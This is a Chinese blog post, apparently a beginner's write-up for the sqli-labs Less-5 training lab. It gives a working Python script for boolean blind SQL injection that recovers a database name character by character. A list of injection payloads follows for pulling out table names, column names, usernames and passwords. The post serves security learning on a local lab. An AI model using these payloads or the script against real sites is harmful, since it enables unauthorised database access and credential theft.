zoukankan      html  css  js  c++  java

  • sqli-labs第5关布尔盲注pyhton脚本

    import requests
import os

#此函数先判断数据库长度
def length(url,str):
	num = 1
	while True:
		str_num = '%d' %num
		len_url = url + "' and (select length(database()) = " + str_num +")--+"
		response = requests.get(len_url)
		if str in response.text:
			print("数据库长度为:%s" %str_num)
			content(url,str,num)
			break
		else:
			num = num + 1

#此函数判断字符串具体的内容
def content(url,str,num):
	s = ['1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
	con_num = 1
	while con_num <= num:
		str_num = '%d' %con_num
		for i in s:
			con_url = url + "' and (select mid(database(),"+ str_num +",1)='"+ i +"')--+"
			response = requests.get(con_url)
			if str in response.text:
				fwrite(i)
		con_num = con_num + 1
#此函数对字符串的内容做记录并输出
def fwrite(i):
	fp = open("cache.txt",'a')
	fp.write(i)
	fp.close()
if __name__ == '__main__':
	url = "http://localhost/sqli-labs/Less-5/?id=1"
	response = requests.get(url)
	str = "You are in..........."
	if str in response.text:
		length(url,str)
	else:
		print("请输入正确的地址")

      初学python,只注重实现功能,不要太在意某些细节,如有建议,感谢提出。

      

    #库中有几个表:

    1' and ((select count(table_name) from information_schema.tables where table_schema = 'security') = 4)--+

    #测表名长度:

    1' and (select length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)) = 10)--+

    #爆表名:

    1' and (select mid((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a')--+

    #表中有几列:

    1' and ((select count(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security') = 3)--+

    #测列名长度:

    1' and (select length((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1)) = 8)--+

    #爆列名:

    1' and (select mid((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1)='u')--+

    #爆用户名:

    1' and (select mid((select username from security.users limit 0,1),1,1)='d')--+

    #爆密码:

    1' and (select mid((select password from security.users limit 0,1),1,1)='d')--+

     以上标红的就是需要递归测试的地方(标红的地方不显示-.-!,将就看),需要者可自行修改代码。还有上述代码中 s 列表请针对具体的情况修改,因为没有特殊字符以及大写字母等。
  • 相关阅读:
    python类的__repr__方法
    元素定位之css选择器(1)
    selenium-find_element相关内容
    selenium-模块概述(1)
    元素定位之css选择器(2)
    css笔记
    html笔记
    html、css、javascript之间的关系
    去除提示“Chrome正在受到自动软件的控制”
    Python3+RobotFramework+pycharm环境搭建
  • 原文地址:https://www.cnblogs.com/Spec/p/10648793.html
Copyright © 2011-2022 走看看